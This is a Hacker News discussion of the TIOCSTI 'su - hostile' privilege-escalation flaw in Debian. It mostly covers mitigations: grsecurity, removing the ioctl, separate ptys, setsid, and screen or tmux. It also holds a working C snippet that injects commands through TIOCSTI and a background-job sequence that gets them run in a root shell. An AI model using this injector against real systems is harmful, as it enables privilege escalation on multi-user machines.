Ancient “su – hostile” vulnerability in Debian 8 and 9 (ludost.net)
145 points by l2dy 4 months ago | 52 comments



For those unaware, ioctl(TIOCSTI) allows injecting characters back into the tty, where they will be read by the next process to read from the terminal. In this case, that process is the root shell that execed su.
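For the curious, a minimal sketch of what such an injector can look like (my own illustration, not the article's PoC; the default "id" payload is just a placeholder):

    #include <stdio.h>
    #include <sys/ioctl.h>
    #include <termios.h>
    #include <unistd.h>

    int main(int argc, char **argv)
    {
        /* Command to "type" into the terminal. */
        const char *payload = (argc > 1) ? argv[1] : "id";
        const char newline = '\n';

        /* TIOCSTI takes a pointer to a single character and queues it in
           the tty's input buffer, exactly as if it had been typed. */
        for (const char *p = payload; *p != '\0'; p++) {
            if (ioctl(STDIN_FILENO, TIOCSTI, p) < 0) {
                perror("ioctl(TIOCSTI)");
                return 1;
            }
        }
        /* Trailing newline so the shell that reads this actually runs it. */
        ioctl(STDIN_FILENO, TIOCSTI, &newline);
        return 0;
    }

Run from a process that still shares the victim's tty, the next reader of that terminal will treat the queued bytes as typed input.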


I guess you're the right person to ask - why hasn't this just been ripped out of the likes of OpenBSD?

edit: seems it already has! https://marc.info/?l=openbsd-cvs&m=149870941319610


Another variant of using TIOCSTI with poor permissions. FWIW, this exact same bug impacted Docker and LXC at various points. In the case of lxc-attach, when stdio is connected to a TTY, it creates a new pty within the container and multiplexes between them to avoid the issue. I don't think there is a single legitimate use for that ioctl... it should just die already.

tl;dr passing a TTY with stopped privileged jobs reading from it (like an interactive root shell) into an unprivileged location is deadly, as the unprivileged location can use TIOCSTI to load up the TTY's input buffer and then exit, causing the stopped jobs to read that input when they're resumed


"Terminal I/O Control - Simulate Terminal Input" ah okay


Yes, I think this is exactly right. su(1M) and sudo(1M) should create a pty to run the child in. And this ioctl should go.
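A rough sketch of the pty approach, under the assumption that su/sudo would proxy the I/O themselves (the helper name and the omitted relay loop are mine, not from any real su):

    #include <pty.h>        /* forkpty(); on glibc, link with -lutil */
    #include <stdio.h>
    #include <sys/wait.h>
    #include <unistd.h>

    /* Hypothetical helper: run the child on a fresh pty, so a TIOCSTI issued
       by the child lands on that pty's input queue rather than on the
       invoking user's terminal. */
    static int run_on_new_pty(char *const argv[])
    {
        int master;
        pid_t pid = forkpty(&master, NULL, NULL, NULL);

        if (pid < 0) {
            perror("forkpty");
            return -1;
        }
        if (pid == 0) {
            /* Child: its controlling terminal is now the new pty slave. */
            execvp(argv[0], argv);
            _exit(127);
        }

        /* Parent: a real su/sudo would relay bytes between its own terminal
           and `master` here (poll/select loop omitted), then reap the child. */
        int status;
        waitpid(pid, &status, 0);
        close(master);
        return status;
    }

    int main(void)
    {
        char *args[] = { "id", NULL };
        return run_on_new_pty(args) != 0;
    }

This is essentially what the lxc-attach approach described further up does, with the relay loop included.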


PaX/grsecurity has had a mitigation for this issue for at least 10 years.

From grsecurity's config help for GRKERNSEC_HARDEN_TTY:

    | There are very few legitimate uses for this functionality and it
    | has made vulnerabilities in several 'su'-like programs possible in
    | the past.  Even without these vulnerabilities, it provides an
    | attacker with an easy mechanism to move laterally among other
    | processes within the same user's compromised session.
Had one been running a grsecurity kernel, the system would not have been affected.

Some independent developers and KSPP people have also been trying for years to get this mitigation into the mainline kernel, but so far none of the patches have been merged. Since grsecurity is now a private product, you may want to check these out and apply the mitigation to a mainline kernel yourself:

    [PATCH] drivers/tty: add protected_ttys sysctl
* https://gist.github.com/thejh/e163071dfe4c96a9f9b589b7a2c24f...

    tiocsti-restrict : make TIOCSTI ioctl require CAP_SYS_ADMIN
* https://lwn.net/Articles/720740/


I'm increasingly feeling that terminals and bash are just too complex, have too many edge cases and footguns, and that we'd be better off just starting over with something where security was a focus from day zero.


Yep. Unix has zillions of ways for processes to interact with each other, which makes for an enormous attack surface. The future is something like unikernels on the server and something like Qubes running them on the desktop, so that each "process" is properly isolated and can only communicate through channels that are deliberately designed for it.

We're going to have to rediscover how we do things like pipelines in a safe way, but the current unix design of small processes interacting via unstructured interfaces that mingle commands and data is just untenable.


They fixed a lot of stuff in Plan 9, and it's a pleasure to tinker with. Everything is partitioned into namespaces to isolate processes. Since the entire system is file-system based, you manipulate the process namespace, which is really just a file listing the mounts and binds that build that namespace's file system. Binds and unions are a blessing and eliminate the headache of environment variables. Every object is a file, and everything is communicated via the network-transparent in-kernel file protocol, 9P. And because of that, Plan 9 is fully distributed.

For example: I can share the internet without a router or NAT by exporting my internet-facing IP stack and mounting it on the machines needing net access. As far as the ISP knows, a single machine is talking to it. I can do the same with file systems, file servers, network cards, sound cards, disks, USB devices, etc.

It's far from usable in production, and 9P is a dog over high-latency links, but the ideas it has are simple yet brilliant. The best distro for newcomers to check out is 9front (they're silly fellows, but don't let that fool you: serious top-notch hackers, that lot).


Because newer software has fewer bugs and is more secure?

I doubt that.


Actually, refactoring a somewhat larger internal project at Google to a different language and architecture served us as a pretty good code review plus self security audit. Yes, there was some turbulence at the beginning, but in the end it turned out to be a far better understood and tested project.

I believe every project should be rewritten every 4-5 years; it becomes less and less expensive to maintain in the long run. It also keeps worker morale and the promotion cycle healthy.

Unfortunately, not all companies have the resources AND the structure to put those resources into refactoring something that already works.


Has that project been subjected to the greater world of people who don't think like Google programmers? Internal projects always suffer from groupthink.

Don't get me wrong, I love internal projects: once I'm behind the gate, they're the first things I probe and attack. Usually very easy targets.


This explains the problem a little clearer I think: https://bugzilla.redhat.com/show_bug.cgi?id=173008


So if I understand correctly, the issue is that when su-ing to more restricted privileges a hostile program (immediately executed via -c) can use TIOCSTI to inject commands which will escape su and execute as the more privileged user?

Is that also an issue using `su; ./hostile; exit`?


No, but it is with

    ( sleep 10 ; hostile ) &
    su
The problem exists when a process with superuser privileges is running a program that reads command input interactively from the terminal at the same time that an unprivileged process has an unrevoked open file descriptor to the same terminal device.
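An illustrative transcript of that variant (the `./inject` helper is hypothetical, something along the lines of a short TIOCSTI loop; prompts and timing are only for illustration):

    $ ( sleep 10 ; ./inject 'touch /pwned' ) &   # planted in the compromised user session
    $ su
    Password:
    # touch /pwned                               <- appears "typed" ~10 seconds later, runs as root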


You mean su to root? The same mechanism still exists, though root already has other powers.


No, I mean su to a new shell and execute a command there rather than su -c.


That would be weird if "su -c" was vulnerable but interactive "su" was not. The former is much easier to fix.

In fact, "su" in Debian (which the subject of the submitted article), calls setsid() when you use -c, which defeats TIOCSTI.


> That would be weird if "su -c" was vulnerable but interactive "su" was not.

Not necessarily. If TIOCSTI just pushes characters into the terminal's input buffer, they will be popped at the next prompt. With an interactive su, that next prompt belongs to the shell running as the same user that executed the hostile program, so nothing runs with escalated privileges; with a non-interactive su, the next prompt belongs to su's caller, so the injected input does run with escalated privileges.

That's my understanding of it anyway, I could be completely off.


I see what you mean.

Yes, the exploit won't work if the payload is read by the attacker's shell, rather than the root shell. But it's easy to ensure that this won't happen. The laziest way is to kill the shell before issuing TIOCSTI ioctls. :-)


As I remember, the `login` program (the one that asks for your login and password on the terminal) does a "virtual hangup" to prevent such things.


Well, on *BSD the way this works is that when the session leader exits the pty/tty will internally call vhangup(2), which in turn does all that revoke(2) does on the tty FD plus it sends SIGHUP to any processes with that tty as the controlling tty.

Linux for a long time had nothing like this. It has a vhangup(2), but looking at its implementation it doesn't seem to do what the BSD vhangup(2) does by calling revoke(2): replace all open file descriptors pointing to the tty with one that returns EIO for read(2)/write(2)/etc.

Linux does NOT have a revoke(2), or at least I can't find it. There was a patch for that back in 2006 and 2007. I don't know what happened to that.

EDIT: Some trivia as well. On BSD SIGHUP is generated by the tty. On Linux and Solaris/Illumos it's only generated by the session leader process on exit, and only if it wants to. This is how bash's disown builtin works: it just doesn't HUP the disowned background jobs. The C shell (csh) historically never generated SIGHUP because it's a BSD shell. Back in the early aughts there was some controversy where csh users wanted OpenSSH's sshd to close a session when the pty session leader exits, as otherwise the session would stay open indefinitely. The OpenSSH developers feared this would lose data, and they were right. The source of this problem was that csh wasn't generating SIGHUP on Solaris and Linux, so background jobs stayed alive and held an open file reference to the pty, which meant that they kept sshd from seeing EOF on the ptm, so sshd would not terminate the session as long as those bg jobs stayed alive. This is all still the case today.


When a tty is hung up on Linux, the file operations of all open file structures associated with it are replaced with hung_up_tty_fops, which means all subsequent read(2) calls return 0 (EOF), write(2) returns EIO, and ioctl(2) returns ENOTTY or EIO.

This is basically a tty-specific implementation of revoke(2).

Also, when the session leader exits on Linux, the kernel does send SIGHUP and SIGCONT to the session leader's process group and the foreground process group (this is in tty_signal_session_leader()).


Oh, that must be pretty new (relative to the early aughts anyways). Sorry I missed it.


Oooh, so that's why my terminals would get hung up on Linux machines when I logged out with a bg job... and why I haven't seen it since switching to macOS or OpenBSD for most logins to other systems :)

thanks :D


You're welcome.

I think it's pretty shocking that there's not yet a revoke(2) for all these systems. If there was, then sshd could revoke(2) the pts when the session leader exits, then wait for EOF, and then close the session.
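For what it's worth, a rough sketch (a fragment, not a complete program) of what that teardown could look like on a BSD-style system that does have revoke(2); the function and variable names are mine, not anything sshd actually does:

    #include <stdio.h>
    #include <unistd.h>

    /* Hypothetical teardown path for an sshd-like daemon, run once the
       pty's session leader has exited. */
    static void close_session(const char *pts_path, int master_fd)
    {
        /* Invalidate every outstanding descriptor to the slave side, so
           lingering background jobs can no longer hold the session open. */
        if (revoke(pts_path) < 0)
            perror("revoke");

        /* Then drain the master until EOF and tear the session down. */
        char buf[512];
        while (read(master_fd, buf, sizeof buf) > 0)
            ;
        close(master_fd);
    }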

Also, please stop using the C shell. It's a shell that sucks. Granted, they all kinda suck, but the C shell more than all the rest. :)

EDIT: Oh, and to be clear, this is about the server-side of ssh. That you're using OS X on the client-side makes no difference.


That would be rather inconvenient here, as you would return to the root shell and find it unresponsive to input.


Ah, this looks like the old ungetc() exploit, where (back in the 1980s at utexas.edu) we'd leave a process connected to a terminal, wait for another user to log in, then push characters to their shell from our program using ungetc(). Essentially, each character pushed ends up looking like a fresh input character to the other program. The basic issue is whether all open file handles that shouldn't be there (our hack program, for example) got closed out by the new login session. For something like login, the question is easy: ONLY login itself should be connected early on. For su, it's much weirder, since the user may have created background jobs before running su, and su and sudo can't reasonably close all other handles on the original tty device.

Further, su and sudo can't close all file descriptors of the "sub-session" as it exits, because the "sub-session" is created by forking, so su/sudo aren't around at the end.

Creating a separate pseudo-terminal device to allow for draconian cleanup, and prevent even having both user IDs connected to the same tty device, seems like the best place to start.

Hmm, now I want to go update the user-group-setter program I use (which can also set auth user IDs on Solaris, etc.) and try having it do pty allocation for the subjob.

In the meantime, try this to get a session and run through the same demo steps:

    setsid -w su - <user>
Won't work for everything (no /dev/tty), but it does block the example. You can add a tty if you have one handy, too, by using redirection in the spawned process in this general form, but I don't currently have the cluon for how to create a /dev/pts/<num> from the shell level - if someone can construct the full command, I'd like to see it :-)

    setsid sh -c 'exec command <> /dev/tty2 >&0 2>&1'


> su/sudo aren't around at the end.

Yes, they are. The world has changed since the 1980s. This particular aspect changed in the middle 1990s.

* http://jdebp.eu./FGA/dont-abuse-su-for-dropping-privileges.h...

There are plenty of tools for manipulating pseudo-terminals, but the correct solution here, that people have been pressing for for quite a number of years now and that some kernel people have already implemented, is to simply remove this ioctl() entirely. setsid() is incorrect for the reasons that Karel Zak alluded to in June 2017, and the work to patch the few users of TIOCSTI such as the C shell and mail has already been done by the OpenBSD people.

* https://news.ycombinator.com/item?id=17312775

* http://jdebp.eu./Softwares/nosh/guide/commands.html#ChainLoa...

* http://jdebp.eu./Softwares/djbwares/


> I don't currently have the cluon for how to create a /dev/pts/<num> from the shell level

As I recommended in http://www.openwall.com/lists/oss-security/2018/06/14/2 , use screen or tmux:

  screen su - <user>
script(1) is more lightweight than screen/tmux, but it can't be easily persuaded to run arbitrary commands, such as "su". :-/


How is persuading script to run su not easy? I just tried script -c su /dev/null and it worked as I expected. (/dev/null is there to prevent script from logging the interaction to a file)


D'oh, you're right. I don't know how I missed this option.



POSIX TTYs, and more precisely stdin/stdout/stderr inheritance and the internals of FDs, have a completely insane design. There is the famous divide between file descriptors and file descriptions. Hilarity can and will ensue in tons of domains. I nearly shipped some code with bugs because of that mess (and could only avoid those bugs by using threads; you can NOT switch your std fds to non-blocking without absolutely unpredictable consequences), and obviously some bugs of this class can create security issues; especially, and in a way obviously, when objects are shared across security boundaries.

Long gone is the time when Unix people were making fun of the lack of security in consumer Windows. Today there is no comprehensive model on the most widely used "Unix" side, while modern Windows certainly has problems in the way it is configured by default, but at least its security model exists, with well-defined boundaries (and even if we can be sad that some seemingly security-related features are not officially considered security boundaries, at least we are not deluding ourselves into thinking that a spaghetti of objects without security descriptors can be shared and the result can be a secure system...)


There is a model, it's just not particularly well publicised: a file descriptor is a capability.

That's it.
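A concrete (if contrived) illustration of that view; the file and the uid are just examples, and the program has to be started as root:

    #include <fcntl.h>
    #include <stdio.h>
    #include <unistd.h>

    int main(void)
    {
        /* Acquire the capability while privileged. */
        int fd = open("/etc/shadow", O_RDONLY);
        if (fd < 0) { perror("open"); return 1; }

        /* Drop privileges; 65534 is the conventional "nobody" uid. */
        if (setuid(65534) < 0) { perror("setuid"); return 1; }

        /* A fresh open("/etc/shadow") would now fail, but the already-open
           descriptor keeps working: holding the fd is holding the right. */
        char buf[64];
        ssize_t n = read(fd, buf, sizeof buf);
        printf("read %zd bytes through the inherited descriptor\n", n);
        return 0;
    }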


Is it efficient and sufficient though? And can and do we build real security on top of it?

This issue shows systems have been built for decades with blatant holes because it was not taken into account in even core os admin tools.

There is also the problem of the myth that everything is an fd, which has never been true and is less and less so as time passes.

Also, extensive extra security hooks and software using them are built, but not on top of this model.

Finally, sharing POSIX fds across security boundaries often causes problems because of all the features available to both sides, whose security impact has not been studied.

A model that just states that POSIX fds are capabilities is wildly insufficient. So if this is the only one, then even in the context of pure POSIX we already know it is an extremely poor one.


Nobody else has pointed this out (!): whatever platform is running at this URL doesn't sanitize input.

Notice how the C #includes seem to be including emptiness. Well, <stdio.h> et al weren't stripped; they're still in the source code, un-converted < > (i.e. NOT converted to &lt; &gt;) and all.


We used TIOCSTI to attack Unix terminal sessions left open to “write” — in 1985. I was wondering when/if this would show up again!



Usually when something is reported as being a distribution bug, it's because they have some patch specific to their packages that causes the issue.

Is that not the case here? Are other distributions affected right now?


I say it again: This is a kernel mechanism.

Every operating system based upon Linux provides programs with this mechanism. This is not some ioctl() introduced by a Debian patch. This is a mechanism added to Linux by Linus Torvalds on 1993-12-23.

* http://repo.or.cz/davej-history.git/commitdiff/9d09486414951...

Pete French added it to FreeBSD against his better judgement on 2010-01-04. It might have been in an earlier implementation of the terminal line discipline, too.

* https://github.com/freebsd/freebsd/commit/74b0526bbe6326adb7...

OpenBSD, which no longer implements the kernel mechanism, had had it since the initial import from NetBSD in 1995.

* https://github.com/openbsd/src/blob/df930be708d50e9715f173ca...

Illumos has it, and has had since at least the OpenSolaris launch.

* https://github.com/illumos/illumos-gate/blob/9a2c4685271c2f0...

It was even in 4.3BSD.


Debian uses su implementation from the shadow package: https://github.com/shadow-maint/shadow

I suspect most other distros use the one from util-linux.


Just tested this out, can confirm it works on Debian 7 as well. Genius little trick! Not sure about practical exploitation, though.


I'm not a shell pro; what is happening on the sleep line?


$ (sleep 10; /tmp/a.out id) &

$ -> the end of the prompt of a "normal" (i.e. non-root) user

() -> run everything inside in a forked subshell of the current shell

sleep 10 -> "block"/sleep for 10 seconds via the `sleep` executable in your $PATH

; -> after the left-hand side terminates, proceed with the next command on the right-hand side

/tmp/a.out id -> fork and exec the program located at /tmp/a.out with the literal byte sequence "id" on its argument vector

& -> run this command (the whole subshell that () requests) as a background job

When the user exits the shell that spawned the subshell, the backgrounded subshell keeps running (a normal shell exit does not SIGHUP background jobs by default), and after its `sleep` child process terminates, it goes on to run `/tmp/a.out`.
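Putting it together, the session from the article looks roughly like this (prompts and output are illustrative, and the exit has to happen within the ten-second window):

    # su - hostile                      <- root drops into the hostile account
    $ ( sleep 10 ; /tmp/a.out id ) &    <- the hostile user's code plants the injector
    $ exit                              <- back to the root shell
    # id                                <- "typed" by TIOCSTI ten seconds later
    uid=0(root) gid=0(root) groups=0(root)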


Ah thanks, I didn't understand the subshell forking part before.


As far as I understand it:

A background subshell is started that waits 10 seconds and then runs a program with the argument "id". That program uses ioctl to send characters to the current TTY.

Since the user exited back to the root shell before the program executed, the `id` command is typed and executed on the root shell.


It's waiting; the program invoked as "a.out" then causes the tty to receive the sequence of characters specified -- in this case "id\n". The vulnerability is that you can switch user contexts as one user, and later (10 seconds in this case, hence "sleep 10") the command still interacts with the tty over a file descriptor that had been given to the child process and was not revoked when you exited the shell that spawned it.


It runs the command in a (subshell), in the background&.

This is to make the process survive the subsequent logout.

Because this process inherited terminal fds from the parent, it can continue accessing the logged out terminal (now root).


Lol. Thanks. Work machine. Must have ctrl-tabbed without realizing.


Pretty sure you're in the wrong thread, mate.


I guess they ctrl-tabbed without realising it...



